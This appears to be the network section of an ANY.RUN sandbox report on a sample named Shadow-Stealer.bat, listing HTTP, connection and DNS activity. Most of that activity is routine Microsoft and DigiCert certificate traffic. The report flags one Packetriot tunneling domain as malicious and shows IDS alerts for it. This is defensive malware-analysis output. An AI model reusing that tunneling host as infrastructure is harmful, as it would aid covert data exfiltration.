Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
42
DNS requests
15
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1980
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
4632
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
6796
SIHClient.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
binary
418 b
unknown
6796
SIHClient.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
binary
409 b
unknown
2344
svchost.exe
GET
200
2.21.20.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
binary
1.11 Kb
unknown
2152
OfficeClickToRun.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
binary
471 b
unknown
2344
svchost.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
binary
1.05 Kb
unknown
2344
svchost.exe
GET
200
2.21.20.137:80
http://crl.microsoft.com/pki/crl/products/MicWinPCA_2010-07-06.crl
unknown
binary
552 b
unknown
2344
svchost.exe
GET
200
2.21.20.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
binary
824 b
unknown
2344
svchost.exe
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl
unknown
binary
814 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
3764
svchost.exe
239.255.255.250:1900
whitelisted
1156
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1980
svchost.exe
40.126.32.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
1980
svchost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
4632
backgroundTaskHost.exe
20.223.35.26:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4632
backgroundTaskHost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
3892
backgroundTaskHost.exe
104.126.37.137:443
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
6796
SIHClient.exe
20.114.59.183:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown

DNS requests

Domain
IP
Reputation
login.live.com
  • 40.126.32.68
  • 20.190.160.20
  • 40.126.32.136
  • 40.126.32.140
  • 20.190.160.22
  • 40.126.32.76
  • 40.126.32.72
  • 40.126.32.74
  • 20.190.159.4
  • 40.126.31.73
  • 40.126.31.67
  • 20.190.159.71
  • 20.190.159.73
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.2
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
slscr.update.microsoft.com
  • 20.114.59.183
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
self.events.data.microsoft.com
  • 20.42.73.26
whitelisted
throbbing-mountain-09011.pktriot.net
  • 167.71.56.116
malicious
nexusrules.officeapps.live.com
  • 52.111.243.29
whitelisted
crl.microsoft.com
  • 2.21.20.137
  • 2.21.20.133
whitelisted
www.microsoft.com
  • 23.218.209.163
whitelisted
umwatson.events.data.microsoft.com
  • 52.182.143.212
whitelisted

Threats

PID
Process
Class
Message
2092
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
2092
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
2092
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Shadow-Stealer.bat